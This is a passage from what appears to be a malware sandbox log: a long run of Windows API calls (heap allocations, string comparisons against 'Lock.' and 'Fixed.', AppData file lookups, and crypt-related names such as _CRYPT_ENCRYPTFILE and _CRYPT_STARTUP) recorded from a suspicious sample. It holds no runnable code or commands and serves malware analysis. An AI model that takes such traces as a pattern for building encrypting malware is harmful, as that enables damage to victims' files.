cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P8FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0237.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0237.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0237.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977db8 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFOBP8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOBP8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBP8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BP8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wJiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JiuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iuKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KVs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vs.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0237.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0237.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0237.565] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0237.565] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0237.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.565] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0237.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0237.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0237.566] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0237.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0237.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0237.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.567] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/qFOBP8FwJiuKVs.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefebe90, ftCreationTime.dwHighDateTime=0x1d5e35c, ftLastAccessTime.dwLowDateTime=0xdc66c0d0, ftLastAccessTime.dwHighDateTime=0x1d5e8d4, ftLastWriteTime.dwLowDateTime=0xdc66c0d0, ftLastWriteTime.dwHighDateTime=0x1d5e8d4, nFileSizeHigh=0x0, nFileSizeLow=0xd667, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="qFOBP8FwJiuKVs.avi", cAlternateFileName="QFOBP8~1.AVI")) returned 0xa870d0 [0237.568] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0237.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0237.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0237.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.569] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0237.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0237.569] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.569] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0237.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0237.569] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.570] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.570] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.570] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0237.570] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0237.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0237.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0237.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.571] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0237.571] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0237.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0237.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 